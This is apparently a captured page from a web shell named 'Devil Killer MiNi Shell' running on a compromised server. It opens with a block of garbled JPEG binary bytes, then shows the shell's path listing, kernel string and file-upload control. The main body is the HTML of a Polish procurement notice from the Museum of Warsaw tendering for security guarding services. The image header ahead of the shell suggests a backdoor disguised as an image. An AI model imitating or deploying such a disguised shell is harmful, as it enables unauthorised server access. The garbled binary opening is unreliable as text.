JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241104/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241104/0057772901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ŚWIADCZENIE USŁUG OCHRONY W OBIEKTACH MUZEUM WARSZAWY </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Warszawy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 016387044</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Starego Miasta 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-272</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@muzeumwarszawy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.muzeumwarszawy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ŚWIADCZENIE USŁUG OCHRONY W OBIEKTACH MUZEUM WARSZAWY </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d7d3e0a1-03a1-4f48-9ed8-78109c8e505f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00577729</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00224685/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi ochrony obiektów Muzeum Warszawy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://muzeumwarszawy.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Określone w SWZ, Rozdział 10. SWZ opublikowana na stronie https://muzeumwarszawy.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Określone w SWZ Rozdział 10</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MW/ZP/1/US/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług ochrony w obiektach Muzeum Warszawy polegające w szczególności na:<br/>a)	ochronie fizycznej obiektów i ochronie fizycznej obiektów i zbiorów oraz dozorowaniu ekspozycji muzealnych,<br/>b)	interwencjach grup interwencyjnych,<br/>c)	ochronie i konwojowanie transportów pieniężnych (wartości pieniężnych do 0,5 jednostki obliczeniowej) oraz ochronie okazjonalnych przedsięwzięć (kulturalnych, wystawienniczych, promocyjnych) realizowanych przez muzeum (lub we współpracy z innymi instytucjami kultury – np. Noc Muzeów, Warszawa w Budowie itp.),<br/>d)	przeprowadzenie raz na pół roku wspólnego szkolenia (na podstawie uzgodnionego planu) dla pracowników ochrony z zakresu bezpieczeństwa muzeów (na podstawie Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z 2 września 2014 r. w sprawie zabezpieczania zbiorów muzeum przed pożarem, kradzieżą i innym niebezpieczeństwem grożącym ich zniszczeniem lub utratą - Dz.U 2014 poz.1240) oraz gromadzenia i przechowywania dóbr kultury,<br/>f)	ochronę okazjonalnych przedsięwzięć wystawienniczo – kulturalnych organizowanych i nadzorowanych przez Muzeum Warszawy. Zakres oraz zapotrzebowanie na liczbę pracowników ochrony będą ustalane każdorazowo w trybie roboczym,<br/>g)	wykonywanie zadań zgodnie z Instrukcją Bezpieczeństwa Pożarowego dla ochranianego obiektu Muzeum Warszawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 18.	Zamawiający na podstawie art. 34 ust. 5 Ustawy przewiduje zastosowanie prawa opcji w zakresie rozszerzenia zamówienia, polegającego na zwiększeniu liczby godzin świadczenia usług, w tym konwojów w 2025 roku. Wielkość zamówienia w prawie opcji będzie nie wyższa niż 10 % kwoty dla zamówienia podstawowego.<br/> Realizacja części zamówienia w prawie opcji jest uprawnieniem Zamawiającego, z którego Zamawiający może skorzystać. Zamawiający zawiadomi Wykonawcę, z którym zostanie zawarta umowa na świadczenie usługi ochrony o rozszerzeniu zakresu zamówienia w zakresie konwojowania <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> <br/>a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania<br/><br/>Wykonawca musi wykazać, ze posiada uprawnienia do prowadzenia działalności w zakresie ochrony osób i mienia w zakresie wymaganym ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. 2021 r., poz. 1995 z późn. zm.) odpowiadającym czynnościom objętym przedmiotem niniejszego zamówienia, tj. posiada koncesję na prowadzenie działalności gospodarczej w zakresie bezpośredniej ochrony fizycznej i zabezpieczenia technicznego objętej przedmiotem zamówienia oraz konwoju środków pieniężnych i dzieł sztuki.<br/><br/>Uwaga!<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie każdy z Wykonawców powinien posiadać koncesję w zakresie w którym będzie wykonywał przedmiotowe zamówienie. Zakres będzie badany przez Zamawiającego na podstawie oświadczenia zawartego w Formularzu II.3<br/>b)	zdolności technicznej lub zawodowej<br/>A)	Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie należycie wykonał:<br/>1)	co najmniej 2 usługi z zakresu ochrony i mienia w instytucjach kultury lub innych obiektach użyteczności publicznej z wyłączeniem obiektów których przeważająca działalność polega na handlu lub gastronomii, każda o wartości co najmniej 1 000 000,00 zł brutto każda.<br/>2)	Co najmniej jedną usługę z zakresu ochrony i mienia w obiekcie udostępnianym do zwiedzania.<br/>3)	Co najmniej jedną usługę w zakresie konwojowania środków pieniężnych i dzieł sztuki<br/><br/>Zamawiający dopuszcza wykazanie się warunkami określonymi w punkcie 2-3 w ramach jednej z usług wykazywanych w ramach warunku określonego w punkcie 1.<br/><br/>B)	Wykonawca musi dysponować stacją monitorowania sygnałów alarmowych.<br/>Zamawiający dopuszcza aby Wykonawca korzystał z potencjału (zasobów podmiotu trzeciego – zobowiązanie) innego podmiotu.<br/><br/>C)	Wykonawca musi dysponować:<br/>1)	co najmniej jednym kwalifikowanym pracownikiem ochrony fizycznej, który ukończył kurs kierowania ochroną muzeów i innych instytucji kultury przechowujących dobra kultury organizowany przez uprawnione instytucje Ministerstwa Kultury i Dziedzictwa Narodowego (dalej: „MKiDN”) lub inne uprawnione podmioty prowadzące szkolenie w powyższym zakresie, posiadającym aktualne badania lekarskie i nie posiadającym ograniczeń psychofizycznych stwierdzonych grupą inwalidzką, uniemożliwiającą lub utrudniającą wykonywanie przedmiotu zamówienia, posiadającym co najmniej 3 letnie doświadczenie jako kierownik ochrony <br/>– funkcja: Kierownik ochrony Muzeum;<br/>2)	co najmniej dwoma koordynatorami ochrony posiadającymi wpis na listę kwalifikowanych pracowników ochrony fizycznej, legitymującym się ukończonym szkoleniem z zakresu kierowania ochroną muzeum lub innych instytucji kultury przechowującej dobra kultury, posiadającym co najmniej trzyletnim doświadczeniem w nadzorowaniu pracowników ochrony w muzeum lub innej instytucji kultury, posiadającym aktualne badania lekarskie i nie posiadającym ograniczeń psychofizycznych stwierdzonych grupą inwalidzką, uniemożliwiającą lub utrudniającą wykonywanie przedmiotu zamówienia – funkcja: Koordynator ochrony Muzeum;<br/>Zamawiający dopuszcza łączenie funkcji określonych w punkcie 1 i 2 przez jedną osobę.<br/>3)	co najmniej jednym pracownikiem posiadającym wpis na listę pracowników zabezpieczenia technicznego, posiadającym aktualne badania lekarskie i nie posiadającym ograniczeń psychofizycznych stwierdzonych grupą inwalidzką, uniemożliwiającą lub utrudniającą wykonywanie przedmiotu zamówienia, funkcja: pracownik zabezpieczenia technicznego;<br/>4)	co najmniej 26 osobami kwalifikowanymi pracownikami ochrony fizycznej, z których każda posiada przeszkolenie do pracy w placówkach muzealnych gromadzących zbiory dóbr kultury przeprowadzone przez uprawnione instytucje podległe MKiDN lub inne uprawnione podmioty prowadzące szkolenia w powyższym zakresie, posiadającymi aktualne badania lekarskie i nie posiadającymi ograniczeń psychofizycznych stwierdzonych grupą inwalidzką, uniemożliwiającą lub utrudniającą wykonywanie przedmiotu zamówienia, zamawiający wymaga, aby kwalifikowani pracownicy ochrony posiadali co najmniej roczne doświadczenie w zakresie ochrony muzeów, w tym co najmniej 6 pracownikami do pełnienia funkcji dowódcy zmiany, z których każda posiada przeszkolenie do pracy w placówkach muzealnych gromadzących zbiory dóbr kultury przeprowadzone przez uprawnione instytucje podległe Ministerstwu Kultury i Dziedzictwa Narodowego (dalej: MKiDN) lub inne uprawnione podmioty prowadzące szkolenia w powyższym zakresie, posiadającymi aktualne badania lekarskie i nieposiadającymi ograniczeń psychofizycznych stwierdzonych grupą inwalidzką, uniemożliwiającą lub utrudniającą wykonywanie przedmiotu zamówienia oraz posiadającymi min. dwu letnie doświadczenie w zarządzaniu i kierowaniu pracownikami ochrony fizycznej (zmianą) w instytucjach kultury/budynkach użyteczności publicznej,<br/>Zamawiający wymaga aby minimum 6 z ww. 26 pracowników uczestniczących w wykonaniu zamówienia posiadało znajomość języka angielskiego w stopniu komunikatywnym.<br/>5)	kwalifikowanymi pracownikami ochrony fizycznej realizującymi konwoje wartości pieniężnych o wartości minimum 0,5 jednostki obliczeniowej oraz dzieł sztuki o wartości mniejszej niż 15 jednostek obliczeniowych;<br/>6)	grupą interwencyjną, która jest zdolna do podjęcia interwencji w czasie nie dłuższym niż 15 min. do każdego chronionego obiektu w dzień i w noc składającą się z kwalifikowanych i uzbrojonych w broń palną pracowników ochrony fizycznej.<br/><br/>Uwaga!<br/><br/>1.	Na etapie postępowania o udzielenie zamówienia publicznego Zamawiający w zakresie punktu 4 wymaga jedynie oświadczenia o zapewnieniu dostępności ww. osób na etapie realizacji zamówienia. Weryfikacja/konkretyzacja informacji o osobach, ich doświadczeniu i kompetencjach nastąpi przed podpisaniem umowy.<br/>Brak złożenia ww. dokumentów lub złożenie błędnych dokumentów, z zastrzeżeniem możliwości jednokrotnego wezwania do uzupełnienia/poprawienia będzie uznawany przez Zamawiającego za uchylanie się od podpisania umowy.<br/>W zakresie punktów 1-3 konkretyzacja musi nastąpić na etapie weryfikacji spełnienia warunków udziału w postępowaniu.<br/>2.	W zakresie punktów 5-6 Zamawiający nie wymaga wskazania minimalnej liczby dostępnych osób oraz ich konkretyzacji. Ocena spełnienia warunku nastąpi na podstawie złożenia odpowiedniego oświadczenia. Ww. warunek winien być odczytywany jako obowiązek zapewnienia odpowiednich osób celem realizacji obowiązków wynikających z Opisu Przedmiotu Zamówienia odnoszących się do poszczególnych warunków udziału<br/>3.	Liczby osób wskazane w punktach 1-4 ww. warunku nie zwalniają Wykonawcy od zapewnienia takiej liczby osób na etapie realizacji, która zagwarantuje należyte wykonanie przedmiotowego zamówienia zgodnie z treścią SWZ i warunkami zawartej umowy.<br/>4.	Uwaga! Obowiązki Wykonawcy w zakresie konieczności zatrudnienia osób na podstawie umowy o pracę zawarte są w Opisie Przedmiotu Zamówienia.<br/>d) sytuacji ekonomicznej i finansowej<br/>Wykonawca musi wykazać, że posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na sumę gwarancyjną na co najmniej 6 000 000 ,- PLN (słownie: sześć milionów złotych)<br/>6.2	W celu potwierdzenia zgodności oferowanych usług z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia Zamawiający wymaga od Wykonawców posiadania certyfikatu ISO potwierdzającego, że Wykonawca działa w oparciu o System Zarządzania Jakością zgodny z wymogami normy PN-EN ISO 9001 w zakresie świadczenia usług będących przedmiotem zamówienia lub inny równoważny dokument wystawiony przez niezależny podmiot zajmujący się poświadczaniem zgodności działań wykonawcy z normami jakościowymi. <br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie certyfikat jest wymagany od co najmniej jednego z członków tworzących Konsorcjum/spółkę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 7)	zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem spełniania przez Wykonawcę określonych norm zarządzania jakością tj. certyfikatu ISO potwierdzającego, że Wykonawca działa w oparciu o System Zarządzania Jakością zgodny z wymogami normy PN-EN ISO 9001 w zakresie świadczenia usług będących przedmiotem zamówienia lub inny równoważny dokument wystawiony przez niezależny podmiot zajmujący się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 7)	zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem spełniania przez Wykonawcę określonych norm zarządzania jakością tj. certyfikatu ISO potwierdzającego, że Wykonawca działa w oparciu o System Zarządzania Jakością zgodny z wymogami normy PN-EN ISO 9001 w zakresie świadczenia usług będących przedmiotem zamówienia lub inny równoważny dokument wystawiony przez niezależny podmiot zajmujący się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 14.1	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 25.000 zł (dwadzieścia pięć tysięcy złotych).<br/>14.2	Wadium musi być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:<br/>a)	pieniądzu, przelewem na rachunek bankowy:<br/>w Banku Pekao O/Warszawa nr Bank Pekao S.A. 28 1240 5918 1111 0000 4911 0618 z podaniem nazwy zamówienia i/lub nr referencyjnego postępowania<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b pomoc finansowa udzielana przez Agencję ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust 6 ustawy.<br/>Dokument gwarancji/poręczenia należy załączyć do oferty w formie elektronicznej opatrzonej kwalifikowanym podpisem. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający zastrzega możliwość:<br/>1)	zmiany sposobu realizacji zamówienia wynikającej ze zmian w obowiązujących w przepisach prawa mających wpływ na realizację przedmiotu Umowy;<br/>2)	zawieszenia świadczenia Usługi na czas remontu Obiektów lub modernizacji systemów zabezpieczeń w Obiektach. W okresie zawieszenia świadczenia usługi Wykonawcy nie przysługuje wynagrodzenie za zakres Usługi, który uległ zawieszeniu;<br/>3)	zmiany zakresu świadczenia Usługi w przypadku zmian organizacyjnych wpływających na zmianę zapotrzebowania na pracowników ochrony fizycznej wykonujących usługę. Wykonawcy nie przysługuje wynagrodzenie za zakres Usługi, który uległ zmniejszeniu.<br/>4)	zmiany zakresu świadczenia Usługi poprzez zmniejszenie liczby posterunków w przypadku braku (ograniczenia) środków finansowych od Zamawiającego. Wykonawcy nie przysługuje wynagrodzenie za zakres Usługi, który uległ zmniejszeniu<br/>5)	zmiany zakresu świadczenia Usługi poprzez zwiększenie zapotrzebowania Zamawiającego na obsadę posterunków na poszczególnych obiektach, zwiększenia liczby godzin objętych konwojem. Wykonawcy będzie przysługiwało (dodatkowe) wynagrodzenie wedle stawki godzinowej przyjętej w ofercie.<br/>Ponadto Zamawiający przewiduje możliwość zmiany umowy w przypadku:<br/>1)	ziszczenia się okoliczności o których mowa w art. 455 ust 1 ustawy Prawo zamówień Publicznych.<br/>2)	W przypadku konieczności zwiększenia maksymalnej wartości umowy o której mowa w § 8 ust 1 w wyniku zwiększonego zapotrzebowania na świadczone usługi w stosunku do OPZ, jednak nie więcej niż o 15 % wartości pod warunkiem posiadania środków na sfinansowanie zamówienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją 